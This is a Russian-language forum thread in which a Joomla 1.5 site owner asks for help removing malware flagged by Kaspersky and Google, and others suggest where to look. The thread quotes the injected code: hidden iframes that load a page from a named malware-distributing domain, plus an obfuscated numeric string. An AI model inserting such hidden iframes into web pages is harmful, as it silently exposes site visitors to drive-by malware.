Joomla 1.5 Как найти вирус?

При откритие сайта каспер видает:
http://i058.radikal.ru/1103/67/06900f4e0461.jpg

Как мне найти етот вирус!?
Скачал сайт на ПК. Пробивал поиском - ничего не нашло..
Такая ситуация на 2 сайтах (на одном хостинге).
Сайти в подписи.

 

В файле configuration все норм =)

Вирус только на главной вибивает.
На главной странице наживаю права клав. - источник.

Есть скрипт вируса! Удалил его, нажимаю применить изменения - не сохраняет.
Как мне изменить значение главной страници!?

 

Заменил - видало ошибку Internal Server Error...
Да еще. сообщение об вирусе показивает только в IE, в Опере почему то не сообщает о вирусе!

 

Проблема не решена - UP

 

еще жива трабля ?

 

Внимание! Обнаружена проблема!
www.allforstudent.in.ua содержит материалы сайта bonuses.corkit.co, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт.
Мы уже сообщили владельцу сайта bonuses.corkit.co о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на bonuses.corkit.co, можно узнать на странице Google Страница диагностики безопасного просмотра.

 

это вылезло при использовании локального прокси и OS Fedora + Google chrome

............ на втором ,тоже самое

как из вариантов...поглядеть на файл index.php и в шаблоне temlates.php (там у вас может переименовано-кто знает)
если надо- постараюсь помочь.
А так...надо искать и думать на основе умозаключений, где могли бы проставлены права на перезапись (666) , потом надо знать и параметры хостинга(бесплатные страдают этим), разрешения в картинках-если не меняли-то ищите откуда прикрепили.
кстати из моих наблюдений....неизменяемые файлы-ставьте разрешение 444

-------------
Ваша проблема - в index.php - там у вас режет Opera с предуставнолеными скриптами.Так к бану от Яндекса подойти легко.


-------показан конец исходного кода страницы сайта

 

На главной странице наживаю права клав. - источник.

Есть скрипт вируса - ......444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t.......
Удалил его, нажимаю применить изменения - не сохраняет.
Как мне изменить значение главной страници!?

А где ви нашли етот вирус!?
</div><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; ".....

Хостинг платный.
Копировал сайт на ПК. При помощью поиска ничего не нашел..

 

Удалил из всех файлов, или это файербаге?

 

А всю базу на ПК скопировать и провести поиск через Дримвивер по всем файлам того куска кода пробовал?

 

Вирус был в файлах index.html.
Вроде удалил со всех.
Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста.
Как мне оттуда убрать вирус?

Да, Каспером. Ничего не находит.
Искал код обычным поиском куска кода в тексте, тоже ничего не нашло.
Сервисы по анализе говорят что вируса нет.
Может подскажете где можно проверить сайт на вирусы

Нет, счас попробую...

 

Как мне зайти на phpMyAdmin, не подскажете!?
Как мне узнать пароль и логин для входа?
Служба поддержки хострера (icq) в выходные не работает

 

draff, Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста. Как мне удалить его с главной страницы?

 

Да по фтп файлы я скачивал, ничего не шашло.
valear: А всю базу на ПК скопировать...
Ето что в базе может бить вирус!?